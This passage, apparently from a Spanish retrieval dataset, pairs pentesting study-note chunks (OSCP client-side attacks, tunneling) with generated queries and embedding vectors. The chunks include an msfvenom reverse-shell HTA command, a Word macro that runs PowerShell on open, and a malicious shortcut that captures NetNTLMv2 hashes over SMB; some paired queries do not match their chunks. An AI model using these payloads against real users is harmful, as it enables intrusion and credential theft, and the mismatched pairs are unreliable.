-0.00616, -0.08556, -0.03044, -0.03763, -0.06986, -0.03742, -0.0114, 0.06718, -0.03789, 0.05231, -0.02122]} +{"tipo": "pregunta", "herramienta": "Client-side attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Client-side attacks.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# Client-side attacks\n\n> Atacas a un **usuario** (que abre un documento/enlace), no a un servicio. Fuente: oscp.trastero.org/clientside.", "indexar": "como puedo realizar pruebas contra el comportamiento del usuario al abrir documentos?", "v": [-0.06346, 0.07991, -0.12304, -0.22889, -0.01762, -0.04229, 0.02137, 0.04143, -0.07198, -0.12648, -0.06449, -0.05863, 0.00849, -0.08561, 0.02378, -0.07548, 0.13927, 0.00962, -0.02769, -0.07797, -0.00828, -0.13446, 0.0051, -0.0089, 0.05996, 0.07446, -0.0541, -0.08595, 0.09008, -0.09958, -0.03284, 0.0211, 0.01747, -0.00584, -0.03475, 0.12592, -0.02639, -0.06094, 0.02111, 0.13645, 0.04854, -0.02983, -0.15438, 0.13455, -0.05909, 0.0603, -0.1267, 0.02718, -0.1346, -0.00728, 0.05829, -0.12881, -0.10472, -0.02743, -0.05362, -0.04443, 0.07401, -0.11523, 0.0596, -0.12281, -0.01805, 0.01386, 0.12182, 0.08771, -0.00554, -0.12615, 0.1174, 0.09469, -0.0541, 0.08704, -0.04789, 0.06998, -0.04399, 0.00121, -0.04574, 0.05369, -0.06924, 0.02225, -0.05512, 0.11851, -0.02989, 0.07003, -0.04927, 0.00585, -0.07412, -0.10772, 0.01026, -0.07777, 0.1217, -0.04305, 0.09282, 0.09061, 0.01518, 0.01331, -0.02237, -0.09113, -0.04737, -0.00686, -0.00821, -0.05958, 0.00292, 0.0308, -0.02939, -0.01253, -0.09176, -0.00983, -0.06005, -0.08817, -0.05029, -0.04779, 0.00245, -0.04955, -0.11817, 0.04968, -0.03541, 0.01454, -0.06817, -0.07342, -0.06936, -0.08335, -0.04776, -0.05865, -0.03857, 0.0092, -0.01551, -0.10174, 0.08601, 0.03201, -0.01474, 0.06142, 0.01496, 0.04871, -0.03964, 0.0424, -0.00276, -0.01842, -0.11125, -0.04476, -0.03441, -0.04068, 0.06661, -0.05097, 0.0121, -0.01518, 0.06826, -0.0553, -0.10583, -0.00663, -0.12298, -0.03787, 0.00641, -0.06058, 0.0075, 0.05438, -0.04396, -0.00196, 0.01622, -0.03687, -0.0115, -0.00168, 0.01448, 0.05529, -0.05202, 0.06334, 0.04917, 0.01435, -0.04984, -0.01207, 0.04398, -0.02707, 0.07278, 0.01539, 0.02717, -0.09298, 0.11477, -0.00992, -0.00111, -0.0334, -0.02416, -0.03565, -0.05076, 0.01777, 0.01186, -0.016, -0.07003, -0.04218, 0.05089, -0.06495, 0.07726, -0.03942, 0.00078, 0.08671, 0.00325, -0.0087, 0.06499, -0.04608, 0.02979, 0.03313, -0.03321, -0.03928, -0.03569, -0.07083, -0.0436, -0.04881, -0.00896, 0.0275, -0.05822, 0.04317, 0.01087, 0.00299, -0.00018, -0.03754, 0.12481, -0.04434, -0.1349, -0.01383, -0.02276, 0.03016, -0.03765, -0.00596, 0.00716, 0.05532, 0.03541, 0.00446, 0.02553, 0.04518, 0.01554, -0.02612, 0.04611, 0.00553, 0.02608, 0.01729, 0.02185, 0.01096, 0.051, 0.03723, 0.01568, -0.04499, -0.00919, -0.07373, -0.05272, 0.08791, -0.0168, -0.12299, -0.01732, 0.01701, -0.06469, -0.01565, 0.01806, -0.05018, -0.04187, 0.00079, 0.07398, -0.0686, 0.02469, -0.07739]} +{"tipo": "pregunta", "herramienta": "Client-side attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Client-side attacks.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Macro de Word (VBA)\n```bash\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 -f hta-psh -o evil.hta # β†’ msfvenom\npython3 split.py # parte el payload codificado en trozos de 50 chars para el VBA\n```\n- VBA con `Sub AutoOpen()` y `Sub Document_Open()` que reconstruye y ejecuta el PowerShell.\n- **Guardar como \"Documento de Word 97-2003\" (.doc)** para que conserve la macro.\n- Verificar: `olevba evil.doc`.", "indexar": "cual es una alternativa libre a msfvenom que me permita ejecutar payloads en VBA?", "v": [0.13672, 0.01388, -0.13409, 0.07514, -0.12898, 0.09047, 0.04732, -0.14411, -0.17508, -0.12534, -0.04423, -0.07809, 0.07931, 0.08533, 0.05101, 0.13058, 0.0411, -0.12865, 0.03432, 0.01776, 0.08884, -0.06194, -0.09353, -0.00061, -0.01996, 0.15128, -0.03864, -0.00592, -0.22308, -0.09723, 0.12176, 0.03207, 0.06833, -0.03173, 0.08482, 0.05965, 0.06321, 0.09477, 0.07393, 0.06996, 0.05612, 0.07749, -0.0832, 0.07503, 0.08613, -0.11735, -0.04801, 0.05256, -0.011, -0.01271, -0.0711, 0.05625, -0.01182, 0.07132, 0.02244, -0.07607, 0.12644, -0.12884, -0.04559, 0.00954, -0.03171, 0.01957, 0.00482, -0.11133, 0.02647, -0.01571, -0.02501, 0.00239, -0.0005, 0.01303, 0.0374, -0.0262, 0.01051, 0.03225, -0.03972, -0.04179, -0.0944, 0.06673, 0.04651, 0.10779, 0.09085, -0.14071, -0.11209, 0.06246, -0.00379, -0.00971, 0.08267, -0.02823, 0.07695, -0.01005, 0.07927, -0.03661, -0.07166, 0.12978, -0.04191, -0.04772, 0.04362, 0.02174, 0.05686, 0.05082, 0.11291, 0.05804, -0.03518, -0.05855, 0.07245, -0.00611, 0.04545, -0.02998, -0.01232, 0.0183, 0.09578, -0.04307, 0.05145, -0.03192, -0.09111, -0.0941, -0.03819, 0.04127, 0.01078, -0.04449, -0.05392, -0.03111, -0.02671, -0.02605, 0.01741, -0.03337, -0.02017, 0.12211, -0.02351, 0.09188, 0.00676, 0.00893, 0.01994, -0.04968, -0.04079, -0.03807, 0.10353, -0.06201, -0.01019, -0.02757, 0.08091, 0.03268, 0.06957, 0.03095, 0.04917, 0.02251, -0.01356, -0.09728, -0.02422, -0.02529, -0.02342, -0.0015, -0.06706, 0.05059, -0.0223, -0.03302, 0.06901, 0.01424, -0.02166, 0.08109, 0.0002, 0.04463, -0.03079, -0.04007, -0.01115, -0.04359, -0.00545, -0.06142, -0.04307, 0.09006, 0.02665, 0.00067, 0.0318, -0.02871, 0.07415, -0.07879, -0.03945, -0.06259, 0.10833, 0.03508, -0.06615, 0.0307, -0.03131, 0.04601, -0.03124, -0.09864, 0.00197, 0.00598, 0.03447, 0.08034, -0.01064, 0.07876, -0.03427, -0.09483, -0.03725, 0.00502, -0.01451, -0.01773, 0.00188, -0.03378, -0.00492, 0.00756, -0.01128, -0.058, -0.06581, 0.00653, -0.0397, 0.06047, -0.01239, 0.00387, 0.08063, -0.00355, 0.12141, -0.04641, -0.04573, -0.01318, 0.01128, -0.02418, 0.01629, 0.02539, 0.0291, 0.08298, 0.11699, -0.04572, -0.03132, -0.00547, 0.03479, 0.03219, 0.02922, -0.00071, 0.02693, 0.01043, -0.01039, -0.01596, 0.08499, 0.03588, 0.00322, -0.0108, -0.0323, -0.00754, 0.06703, 0.04075, -0.0727, -0.09648, -0.00838, -0.05185, -0.06715, 0.02674, -0.04734, -0.01646, -0.02394, 0.0869, 0.02977, -0.00355, 0.05612, 0.02185]} +{"tipo": "pregunta", "herramienta": "Client-side attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Client-side attacks.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Macro de Word (VBA)\n```bash\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 -f hta-psh -o evil.hta # β†’ msfvenom\npython3 split.py # parte el payload codificado en trozos de 50 chars para el VBA\n```\n- VBA con `Sub AutoOpen()` y `Sub Document_Open()` que reconstruye y ejecuta el PowerShell.\n- **Guardar como \"Documento de Word 97-2003\" (.doc)** para que conserve la macro.\n- Verificar: `olevba evil.doc`.", "indexar": "que herramienta sirve para generar y ejecutar macros de Word 97-2003 como arma social engineering?", "v": [0.01632, -0.09962, -0.03386, -0.21156, -0.04428, -0.08421, -0.07561, -0.00989, -0.01997, -0.06936, -0.15855, -0.03038, 0.08437, -0.06783, 0.13867, 0.03943, 0.11968, -0.10674, -0.0763, 0.10335, 0.03299, 0.0228, 0.02219, -0.11966, -0.07231, 0.01132, -0.03226, -0.05912, -0.20894, 0.12844, -0.02135, 0.09843, 0.06053, -0.07147, -0.08089, -0.02686, -0.0346, 0.03725, -0.01511, 0.15694, -0.05431, 0.07513, -0.12517, 0.04302, 0.04535, 0.05733, -0.01131, 0.08181, 0.04517, 0.10758, -0.07358, 0.01371, -0.08964, -0.00426, -0.04353, -0.06734, 0.18936, -0.10619, -0.08597, -0.09324, -0.1436, -0.01931, -0.04361, -0.0159, -0.07672, -0.01719, 0.00811, -0.0409, -0.01283, 0.08736, -0.09105, 0.01696, 0.04585, -0.00107, -0.00818, -0.11749, -0.0131, 0.12079, -0.0133, 0.04672, -0.07024, -0.06543, -0.15432, -0.03557, -0.00186, -0.00202, 0.05953, -0.08345, 0.00521, -0.06914, -0.01691, -0.01963, -0.02643, 0.06509, 0.01924, 0.00736, 0.01194, 0.03166, 0.00381, -0.07163, 0.09095, -0.17407, -0.05491, -0.01676, -0.06852, 0.01795, -0.02901, 0.06301, -0.0639, 0.01385, 0.04455, -0.0415, 0.04676, -0.05528, 0.04331, -0.04652, -0.02535, 0.0203, 0.05215, -0.0474, 0.03269, 0.05429, -0.03856, 0.03777, -0.03171, 0.04453, -0.04398, 0.07264, -0.03537, -0.02647, 0.02668, -0.01005, -0.03407, -0.03613, -0.04251, -0.04951, 0.04572, -0.14273, -0.02741, -0.09383, 0.07169, 0.03676, -0.0601, -0.09998, -0.02507, 0.06536, 0.02626, -0.07753, -0.00315, 0.04091, 0.03309, -0.0062, -0.07036, 0.03641, -0.10824, 0.02519, -0.04469, 0.06832, -0.02535, 0.0899, -0.02319, -0.05517, -0.02711, -0.06891, -0.02022, 0.00561, -0.01878, -0.00426, 0.08362, 0.0158, 0.03119, -0.02787, -0.02169, 0.03285, 0.0619, -0.0546, -0.05778, -0.03566, -0.02533, -0.08355, -0.07353, 0.00363, -0.04685, -0.00858, 0.04719, -0.07976, 0.0092, -0.04037, 0.00305, 0.02457, -0.06134, 0.00553, 0.05743, -0.05488, 0.07116, 0.00244, 0.00276, -0.04957, 0.05375, -0.1289, 0.01537, -0.01132, 0.02997, -0.03528, 0.05504, 0.07367, 0.00129, 0.00388, -0.01792, 0.04291, -0.04958, -0.01839, -0.01811, 0.03375, -0.02745, -0.05558, 0.03424, 0.0494, -0.01652, 0.01766, -0.00274, -0.00569, 0.09565, -0.02833, -0.01682, -0.02867, -0.02503, -0.04757, 0.0084, -0.0435, 0.01188, 0.01162, -0.03302, 0.02462, 0.03364, -0.12533, 0.08491, -0.01199, -0.05807, -0.06985, 0.01019, 0.04295, 0.05044, -0.02875, -0.05175, -0.02099, -0.02065, -0.07498, -0.0564, -0.0926, -0.04477, -0.00086, 0.02549, 0.03289, 0.01962, -0.04186]} +{"tipo": "pregunta", "herramienta": "Client-side attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Client-side attacks.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Macro de Word (VBA)\n```bash\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 -f hta-psh -o evil.hta # β†’ msfvenom\npython3 split.py # parte el payload codificado en trozos de 50 chars para el VBA\n```\n- VBA con `Sub AutoOpen()` y `Sub Document_Open()` que reconstruye y ejecuta el PowerShell.\n- **Guardar como \"Documento de Word 97-2003\" (.doc)** para que conserve la macro.\n- Verificar: `olevba evil.doc`.", "indexar": "con que puedo montar un payload de PowerShell oculto dentro de un archivo doc antiguo?", "v": [0.14361, -0.03615, -0.06658, -0.11151, -0.17694, 0.00568, 0.06623, 0.0266, -0.06183, -0.0177, -0.14651, -0.0177, 0.04386, 0.02154, -0.07696, -0.01081, 0.11199, -0.03988, -0.03683, -0.01068, -0.05515, 0.03441, -0.07489, -0.04529, 0.04285, 0.11178, -0.05636, 0.1285, -0.25212, -0.00498, -0.02065, 0.133, 0.04472, -0.01571, -0.05236, 0.08748, 0.01741, 0.08353, -0.00686, 0.10245, -0.04224, 0.08753, -0.13758, 0.1483, 0.00136, 0.00679, 0.04368, -0.00951, 0.03547, -0.07804, 0.00814, -0.13746, -0.06314, 0.05082, -0.04111, -0.15029, 0.04496, -0.05599, 0.04333, -0.01033, -0.02135, 0.15809, -0.03, 0.03803, -0.04146, -0.0621, -0.02218, 0.08101, -0.09909, -0.01559, -0.06703, 0.02168, 0.09224, 0.04775, -0.04442, -0.04768, 0.00146, -0.10923, -0.03854, 0.16031, -0.02487, 0.01254, -0.07882, 0.0591, -0.07322, -0.05291, 0.00024, 0.02615, 0.01568, -0.07239, 0.11729, 0.04991, -0.07199, 0.10138, 0.04231, -0.08448, 0.01447, 0.05695, -0.01018, -0.00866, -0.06705, 0.05374, 0.0589, 0.05958, 0.2071, 0.09465, 0.05632, -0.05853, 0.02963, -0.01257, 0.0351, 0.00246, 0.07399, 0.10267, -0.07909, -0.03136, 0.0098, 0.07403, -0.00015, -0.0575, -0.034, 0.0108, -0.00939, 0.10638, 0.01891, -0.12638, -0.00426, 0.11886, 0.00865, 0.01664, -0.05107, 0.0449, -0.01715, -0.00266, -0.00635, -0.05282, 0.07908, 0.02176, -0.07771, -0.02593, 0.14141, -0.02381, 0.00879, 0.04377, 0.01799, 0.00124, 0.00553, -0.02737, -0.0292, -0.03912, 0.06912, 0.04517, 0.06581, 0.00298, -0.01914, -0.02681, 0.11661, -0.07401, -0.01544, -0.0343, -0.02931, 0.10602, -0.05696, -0.00826, -0.04939, -0.06481, -0.08501, -0.07572, -0.01032, 0.0011, 0.05883, -0.02547, 0.01546, -0.05836, 0.00982, -0.01807, -0.02845, -0.06657, 0.06492, 0.00369, -0.05861, -0.00468, 0.01862, 0.07717, -0.06665, -0.0053, 0.05772, -0.04249, 0.04303, 0.00575, 0.02012, -0.01207, 0.00466, -0.01668, 0.02343, -0.0683, -0.02134, 0.04921, 0.02767, -0.00528, 0.02355, -0.04478, -0.05121, 0.03149, -0.04203, -0.02847, -0.03699, 0.01677, 0.03641, -0.01878, 0.10771, -0.02704, 0.11482, -0.06546, -0.04075, -0.01676, -0.01529, 0.0031, -0.01859, 0.0477, -0.04161, 0.02996, 0.11285, -0.05591, 0.03843, 0.00984, 0.05118, 0.04554, 0.00785, 0.02581, -0.01041, 0.0744, -0.06334, 0.04259, 0.05455, -0.02619, -0.01134, 0.02634, -0.07297, 0.00947, 0.03106, 0.00092, -0.02, -0.01563, -0.02288, -0.01126, -0.04349, 0.05014, 0.01218, -0.02649, -0.02184, 0.02238, 0.00429, -0.02074, -0.00119, -0.06624]} +{"tipo": "pregunta", "herramienta": "Client-side attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Client-side attacks.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Acceso directo malicioso (.url / .lnk)\n```ini\n[InternetShortcut]\nURL=file://TU_IP\nIconFile=\\\\TU_IP\\SERVER\\%USERNAME%.icon\nIconIndex=1\n```\n- El `IconFile` con ruta **UNC** fuerza al cliente a autenticar contra tu SMB β†’ **capturas su hash NetNTLMv2**.\n```bash\nimpacket-smbserver -smb2support SERVER $(pwd) # o Responder β†’ Herramientas (Γ­ndice)\n```\n- El hash capturado β†’ Cracking de contraseΓ±as (`hashcat -m 5600`) o relay.\n\nRelacionado: AV evasion Β· Cracking de contraseΓ±as Β· Authentication attacks Β· OSCP MOC", "indexar": "que herramienta sirve para capturar hashes NetNTLMv2 mediante un acceso directo malicioso en SMB?", "v": [-0.14402, -0.04443, -0.04492, -0.14774, 0.03232, -0.09566, -0.21379, -0.03334, -0.09226, 0.05162, -0.10993, -0.01796, 0.08936, -0.07836, 0.00862, 0.17129, -0.00803, -0.12224, -0.02649, 0.00911, -0.00899, -0.00408, -0.06369, -0.15472, -0.01697, -0.08134, 0.0284, 0.08946, -0.1925, 0.01859, -0.05547, -0.03129, -0.05109, 0.05777, 0.01362, -0.16842, -0.02898, 0.04914, 0.00441, 0.08509, 0.10539, 0.07119, -0.11871, 0.04363, 0.0323, -0.08012, -0.06452, -0.0095, -0.0045, -0.0564, 0.03097, 0.02703, -0.21729, -0.05261, -0.12909, -0.05223, 0.15238, -0.09489, 0.01243, -0.15672, -0.07356, -0.00784, -0.01613, -0.10647, 0.02765, -0.08377, 0.06618, 0.02556, -0.1507, 0.02324, -0.06423, 0.08182, 0.07626, 0.01318, -0.04359, 0.04055, -0.04419, 0.08602, 0.07751, 0.01682, 0.02329, -0.13305, -0.05034, 0.00108, -0.15004, -0.0306, 0.08484, -0.03723, -0.02294, -0.11825, 0.02933, 0.06014, 0.035, 0.03724, 0.02094, -0.07539, 0.02587, -0.07329, 0.11415, -0.06271, 0.07935, -0.03695, -0.11651, 0.07088, -0.04276, 0.01477, 0.07556, -0.03493, -0.05165, 0.03378, 0.03788, 0.01681, -0.01419, 0.0042, -0.02061, 0.00555, -0.02319, -0.08299, 0.02692, -0.06299, -0.05014, -0.02923, -0.00722, -0.02499, -0.01903, -0.00178, -0.02094, 0.0282, -0.00198, -0.0336, -0.03047, 0.02843, -0.0499, -0.00696, -0.03223, -0.09692, 0.0569, -0.11488, -0.04771, -0.1144, -0.00088, -0.0038, -0.08566, -0.09452, 0.06393, 0.02053, 0.03872, -0.05845, -0.05728, 0.01268, 0.09678, -0.02598, -0.06622, 0.00908, -0.01088, 0.05183, -0.0576, 0.03476, -0.10814, 0.08443, -0.04257, -0.04206, 0.04638, 0.03239, -0.09137, -0.07297, -0.01312, -0.04674, 0.07768, -0.01006, -0.0181, 0.00872, 0.01722, -0.06109, 0.00823, -0.05715, 0.00549, -0.00081, 0.08213, -0.10429, -0.01345, -0.01414, 0.03087, -0.00718, -0.02647, -0.00227, 0.03402, 0.03755, -0.02893, 0.04616, 0.00499, 0.01861, -0.04385, 0.03893, 0.01647, -0.04204, -0.02949, -0.0152, 0.07537, 0.02025, -0.01922, 0.00631, -0.03424, -0.01705, 0.04799, 0.05668, -0.00915, -0.02315, -0.01956, 0.02377, -0.01409, 0.02437, 0.06592, -0.06116, 0.01378, 0.0038, 0.06519, 0.02397, -0.00314, 0.06332, -0.02702, 0.0194, 0.05103, 0.06004, 0.01935, 0.00484, -0.00269, 0.05064, 0.00857, -0.00314, -0.02218, -0.01023, 0.0035, -0.05295, -0.02749, -0.04251, -0.00925, -0.00207, -0.04589, -0.03501, 0.01576, 0.06787, -0.016, -0.00935, 0.00291, -0.04899, -0.0365, -0.0213, 0.00588, -0.06156, -0.04183, 0.00299, 0.03588, 0.01138, -0.02277, -0.01534]} +{"tipo": "pregunta", "herramienta": "Client-side attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Client-side attacks.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Acceso directo malicioso (.url / .lnk)\n```ini\n[InternetShortcut]\nURL=file://TU_IP\nIconFile=\\\\TU_IP\\SERVER\\%USERNAME%.icon\nIconIndex=1\n```\n- El `IconFile` con ruta **UNC** fuerza al cliente a autenticar contra tu SMB β†’ **capturas su hash NetNTLMv2**.\n```bash\nimpacket-smbserver -smb2support SERVER $(pwd) # o Responder β†’ Herramientas (Γ­ndice)\n```\n- El hash capturado β†’ Cracking de contraseΓ±as (`hashcat -m 5600`) o relay.\n\nRelacionado: AV evasion Β· Cracking de contraseΓ±as Β· Authentication attacks Β· OSCP MOC", "indexar": "como evitar que el cliente se autentique contra mi servidor SMB cuando comparto archivos?", "v": [-0.04874, -0.06624, -0.10909, -0.0702, -0.09296, -0.15261, 0.00365, -0.09105, -0.14595, -0.00276, -0.15481, -0.0227, 0.14465, -0.00835, 0.0374, 0.06388, 0.13534, -0.08975, 0.12231, 0.10676, 0.09721, 0.00953, 0.18693, -0.05128, -0.10791, -0.04986, 0.05335, 0.14013, -0.05868, 0.02123, -0.02813, -0.01976, 0.06541, -0.02185, 0.07284, -0.09129, -0.04257, 0.14447, -0.06876, 0.03248, 0.27065, -0.05289, -0.08946, 0.0244, -0.05142, -0.02017, 0.01858, 0.0051, 0.04923, 0.07524, -0.12797, -0.03495, -0.15575, 0.08134, -0.09355, 0.05461, 0.02249, -0.09329, 0.13892, -0.02117, -0.08592, 0.05635, 0.02394, 0.05207, 0.08233, -0.1094, -0.02083, -0.04886, -0.0356, -0.02121, -0.10282, 0.05136, 0.03358, -0.05898, 0.03026, 0.00737, 0.10382, -0.02235, 0.03266, 0.02257, 0.01312, 0.04153, 0.02421, 0.09549, -0.02805, -0.13397, -0.01073, -0.01121, 0.00544, 0.03985, 0.01026, 0.0722, -0.06649, 0.03637, 0.01089, -0.12882, 0.07063, -0.10889, 0.01123, -0.02233, 0.04011, -0.00074, -0.04209, 0.04764, 0.06953, 0.0496, 0.08194, -0.03958, 0.00097, 0.00202, 0.01932, -0.05041, -0.0242, 0.0538, -0.07388, -0.07928, 0.00619, -0.02483, 0.02448, -0.0099, -0.07489, 0.01868, 0.0162, 0.02499, -0.0345, 0.04525, 0.06793, 0.04848, -0.06161, -0.02907, -0.07164, 0.04028, -0.00685, 0.02522, -0.07294, 0.01748, 0.10494, -0.04919, -0.08103, -0.04012, 0.02646, 0.0093, -0.01395, 0.04013, 0.08873, -0.02181, -0.00543, -0.08024, -0.11499, 0.01398, -0.00208, -0.00764, -0.05451, -0.02772, -0.05163, 0.04598, 0.01845, -0.15156, -0.00729, 0.03465, -0.0013, 0.10868, 0.03116, 0.10302, 0.02324, -0.06468, 0.01663, 0.07371, 0.06006, -0.03303, 0.02625, 0.03004, -0.02279, -0.10559, 0.02819, 0.04635, -0.03442, -0.05266, 0.04728, -0.00339, -0.00834, -0.05105, 0.00582, 0.04298, -0.02552, -0.01893, -0.01964, 0.04205, -0.01184, 0.04013, -0.01733, 0.00442, -0.04805, 0.05052, -0.03221, -0.0533, -0.01758, 0.02145, -0.02173, 0.01067, -0.00772, -0.04714, -0.0937, -0.01383, 0.0466, 0.01814, -0.02269, 0.01846, -0.0055, -0.03449, 0.03564, -0.01929, 0.10967, -0.0467, -0.00915, 0.00026, 0.04203, -0.02452, 0.04776, -0.07573, 0.03833, 0.02623, 0.03958, 0.02845, -0.0717, 0.05506, 0.00165, -0.03257, 0.07555, -0.02007, -0.0516, 0.00372, -0.03792, 0.03624, 0.06254, 0.00937, 0.0387, -0.09787, -0.02509, -0.07039, 0.01533, 0.01309, -0.02374, -0.0552, -0.00621, -0.00753, -0.04549, -0.007, -0.00537, -0.01322, 0.04856, -0.01542, 0.04009, 0.02203, 0.03773, -0.0383]} +{"tipo": "pregunta", "herramienta": "Client-side attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Client-side attacks.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Acceso directo malicioso (.url / .lnk)\n```ini\n[InternetShortcut]\nURL=file://TU_IP\nIconFile=\\\\TU_IP\\SERVER\\%USERNAME%.icon\nIconIndex=1\n```\n- El `IconFile` con ruta **UNC** fuerza al cliente a autenticar contra tu SMB β†’ **capturas su hash NetNTLMv2**.\n```bash\nimpacket-smbserver -smb2support SERVER $(pwd) # o Responder β†’ Herramientas (Γ­ndice)\n```\n- El hash capturado β†’ Cracking de contraseΓ±as (`hashcat -m 5600`) o relay.\n\nRelacionado: AV evasion Β· Cracking de contraseΓ±as Β· Authentication attacks Β· OSCP MOC", "indexar": "con que programa puedo simular autenticaciΓ³n SMB y obtener el hash de usuario?", "v": [0.05423, -0.00087, -0.16951, -0.09264, 0.08145, -0.15715, -0.21023, -0.15172, -0.06804, 0.05615, -0.09875, 0.0488, 0.09606, -0.04586, -0.04651, 0.06752, 0.02464, -0.04833, -0.05964, 0.12304, 0.17041, -0.02296, -0.05469, -0.07118, -0.02438, -0.02152, -0.01589, 0.08652, -0.02076, -0.08291, 0.063, 0.01681, 0.03798, -0.08889, -0.00704, 0.00268, -0.02505, 0.0257, 0.0578, 0.10111, 0.11741, 0.05876, -0.01944, 0.01041, 0.07886, 0.01041, -0.01161, -0.04449, -0.02101, -0.0816, -0.0002, -0.02927, -0.21838, -0.01913, -0.03439, -0.14682, 0.12448, -0.18146, 0.00624, -0.07765, 0.02634, -0.00693, 0.09726, -0.00501, 0.07979, 6e-05, 0.15153, 0.04803, -0.05298, 0.06855, -0.04352, 0.08033, 0.01673, -0.03855, 0.01546, -0.00259, -0.08009, -0.0456, 0.06676, -0.02074, -0.02323, -0.11243, 0.11291, 0.05329, -0.08826, -0.02523, 0.07076, -0.06107, 0.09493, -0.04323, 0.00163, 0.0815, 0.0778, 0.10413, 0.04628, -0.09661, 0.11691, -0.03558, 0.03097, -0.00278, 0.02088, -0.00451, -0.13924, 0.15577, -0.0251, 0.06013, 0.10726, -0.03953, 0.02457, 0.06026, 0.02144, -0.04578, -0.11233, 0.02914, -0.03896, 0.04308, -0.04466, -0.07719, 0.05064, -0.09764, -0.06545, 0.00445, 0.00419, -0.01018, 0.06005, 0.0238, -0.02231, 0.09012, -0.06402, 0.00675, -0.01417, 0.04534, -0.02954, -0.00173, -0.00256, -0.08519, 0.00635, -0.03988, 0.01687, -0.03642, 0.03477, 0.09421, -0.00287, -0.06484, -0.00526, -0.01806, -0.06977, -0.05923, -0.06039, -0.00554, 0.03578, 0.0096, 0.02633, 0.09153, -0.08105, -0.00958, 0.01861, -0.04849, -0.03563, 0.05991, -0.07251, 0.02141, -0.00018, -0.04681, 0.03389, -0.03934, 0.02399, -0.0254, 0.02839, 0.07607, -0.05711, 0.05622, 0.08152, -0.07031, 0.06702, 0.03269, -0.02879, -0.05785, -0.00856, -0.06038, -0.04955, 0.00108, 0.05074, -0.01165, -0.02615, -0.06268, -0.07251, 0.07714, 0.04446, 0.02847, 0.02427, 0.04425, -0.02358, 0.0481, 0.01519, 0.04369, 0.0422, 0.04432, 0.06957, -0.04455, -0.03022, 0.0087, -0.01241, -0.03902, 0.07232, 0.10034, -0.02839, 0.00945, 0.0424, 0.07286, 0.02791, -0.02171, 0.03083, -0.03261, 0.00797, -0.05349, 0.03384, 0.04408, 0.03697, -0.0131, -0.03625, 0.04816, 0.03054, 0.08284, -0.04865, -0.04685, 0.01901, 0.04135, -0.00452, 0.00915, 0.00572, -0.01895, 0.00946, 0.01442, 0.05099, 0.03808, 0.02526, 0.00172, -0.03595, -0.07826, -0.04403, 0.04675, -0.01094, -0.0525, -0.00029, 0.02836, -0.08461, -0.01751, 0.01398, -0.00764, -0.03981, 0.00541, 0.08771, -0.052, 0.01949, 0.01431]} +{"tipo": "pregunta", "herramienta": "Tunneling", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# Tunneling y port forwarding\n\n> Reenviar puertos y montar proxies para alcanzar redes internas. Alternativas a Pivoting ligolo-ng. Fuente: oscp.trastero.org/tunneling.", "indexar": "que programa sirve para reenviar puertos", "v": [0.13836, -0.1035, -0.12972, -0.11507, 0.12043, -0.08141, 0.1591, -0.18278, 0.03199, -0.14042, -0.00551, -0.0117, 0.11157, -0.10526, 0.02083, 0.0469, -0.0045, 0.04491, 0.15413, 0.06699, -0.05046, 0.04642, -0.0278, -0.01397, 0.05489, 0.1068, 0.11414, -0.03779, -0.02548, 0.01643, 0.02068, 0.0339, 0.06639, -0.09404, -0.05131, -0.10891, 0.03309, 0.04272, 0.03261, 0.10035, 0.11921, -0.01985, -0.05342, -0.02298, 0.08246, -0.01297, 0.03892, -0.01336, 0.04736, -0.02725, -0.00724, 0.07319, -0.01337, 0.05943, -0.01155, -0.03176, -0.12684, -0.07721, -0.07074, -0.0994, -0.00958, -0.00079, -0.04034, -0.10763, 0.04282, -0.04367, 0.00563, 0.06933, -0.12983, 0.00729, -0.07661, -0.00069, 0.08487, 0.02388, -0.07206, -0.08837, -0.00434, -0.00024, 0.01395, 0.03398, 0.03122, -0.04032, 0.00863, 0.00867, -0.02324, 0.02501, -0.04647, -0.01491, 0.03215, -0.10002, -0.04549, 0.02004, 0.01482, 0.15719, 0.04942, -0.02981, 0.05931, 0.05192, -0.00994, 0.03448, 0.11571, -0.02437, -0.0376, -0.01113, -0.03553, 0.11415, 0.08623, -0.06602, 0.01087, 0.06209, 0.08329, 0.00416, 0.02313, -0.11193, -0.0552, 0.06402, -0.01447, -0.12815, 0.07902, 0.01495, -0.05937, -0.05676, -0.06132, 0.06382, 0.01272, 0.05627, 0.02992, 0.1168, 0.02073, 0.07758, 0.03965, -0.01335, -0.01991, -0.0038, -0.07349, -0.16621, 0.05913, -0.06063, -0.02642, -0.04461, -0.00571, 0.11659, -0.02194, 0.0746, -0.02166, 0.01645, 0.0544, -0.03699, -0.01914, -0.01018, 0.04004, 0.07279, -0.02132, 0.02901, -0.10384, -0.00694, 0.10734, -0.02009, -0.05387, 0.05751, -0.04874, -0.02002, -0.06621, -0.07233, 0.119, -0.04172, -0.03941, 0.00586, 0.09347, 0.10015, -0.01909, 0.07453, -0.00698, -0.08246, -0.0255, 0.04969, 0.01128, -0.0386, -0.024, 0.0104, -0.09866, 0.04774, 0.04498, 0.03528, -0.06867, -0.09, -0.08076, -0.03719, 0.02173, 0.02254, -0.02445, -0.02183, -0.03103, 0.00968, -0.03501, 0.00405, -0.04982, 0.03517, 0.02474, -0.02818, 0.05341, 0.03769, 0.03864, -0.00966, 0.05205, 0.13419, -0.0523, 0.00015, 0.07097, 0.11142, -0.04321, -0.0385, 0.03599, 0.04804, -0.02454, -0.02822, 